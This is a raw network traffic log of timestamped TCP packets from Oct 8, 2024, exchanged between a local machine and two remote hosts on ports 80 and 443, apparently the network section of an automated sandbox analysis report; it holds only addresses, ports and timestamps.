Oct 8, 2024 20:47:24.472613096 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472620010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.472640038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.472657919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.473007917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473052025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.473059893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473068953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473092079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.473105907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.473189116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473197937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473207951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473217964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.473237038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.473261118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.485888958 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.485965967 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.486054897 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.486249924 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.486274004 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.486289024 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.486295938 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.489208937 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.489243031 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.489310026 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.489437103 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.489454031 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.508805990 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.509012938 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.509145021 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.509361982 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.509373903 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.509386063 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.509391069 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.512183905 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.512217999 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.512299061 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.512471914 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.512484074 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.522439957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522478104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522488117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522558928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.522584915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522603035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522614002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522624969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522641897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.522654057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.522737980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522790909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522831917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.522845030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522855997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522867918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.522878885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.522906065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.523017883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.523027897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.523037910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.523052931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.523078918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.527822018 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.531641006 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.531676054 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.532092094 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.532099009 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.541045904 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.541174889 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.541259050 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.541445017 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.541459084 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.541474104 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.541480064 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.544068098 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.544079065 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.544152021 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.544316053 CEST	49790	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.544325113 CEST	443	49790	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.554944038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555003881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555016994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555069923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555104017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555135012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555145979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555157900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555167913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555171967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555182934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555196047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555233002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555329084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555341005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555372000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555454016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555464983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555476904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555489063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555489063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555500031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.555512905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.555550098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556040049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556077957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556099892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556109905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556142092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556242943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556255102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556267023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556276083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556277037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556288958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556303978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556325912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556483030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556493044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556504965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556515932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556524992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556528091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556540012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556560993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556672096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556705952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556783915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556794882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556807995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556818962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556823969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556830883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556839943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556873083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.556936979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556946993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.556977987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557152987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557188034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557192087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557199001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557219982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557238102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557308912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557320118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557333946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557346106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557347059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557364941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557395935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557415962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557449102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557554007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557564020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557575941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557588100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557593107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557600975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557610989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557621956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557626963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557634115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557657003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557836056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557845116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557864904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557876110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557883024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557887077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557898045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557898045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557909966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557920933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557926893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557929993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557940960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557948112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557952881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557962894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557965040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557974100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.557981968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.557995081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558016062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558196068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558207035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558217049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558239937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558259010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558346033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558357000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558367014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558377981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558388948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558389902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558401108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558413029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558413982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558424950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558429956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558454037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558615923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558626890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558638096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558649063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558656931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558661938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558671951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558695078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558804035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558815002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558825970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558835030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558835030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558845997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558856964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558861971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558870077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.558877945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.558902025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559065104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559075117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559087992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559099913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559103966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559111118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559123993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559125900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559134960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559145927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559150934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559156895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559164047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559168100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559180021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559180975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559207916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559225082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559719086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559751987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559762955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559789896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559812069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559844017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559855938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559866905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559878111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.559886932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559911013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.559977055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.560009003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609273911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609304905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609314919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609363079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609399080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609416962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609426975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609438896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609450102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609460115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609467030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609491110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609508038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609688044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609698057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609709024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609719038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609730959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609730959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609757900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609767914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609793901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609803915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609813929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.609841108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.609874010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.628820896 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.628873110 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.628931999 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.629216909 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.629240036 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.641947031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.641956091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.641964912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.641993046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642019033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642023087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642029047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642040014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642050982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642069101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642082930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642210960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642221928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642232895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642244101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642251968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642254114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642265081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642276049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642285109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.642285109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642316103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.642479897 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.642509937 CEST	443	49791	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:24.642700911 CEST	49791	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:24.643059969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643100977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643107891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643116951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643146038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643163919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643258095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643268108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643277884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643289089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643299103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643301010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643362045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643430948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643440008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643450022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643460035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643471003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643471003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643481016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643491030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.643660069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643670082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643682003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.643686056 CEST	49755	80	192.168.2.5	95.164.90.97
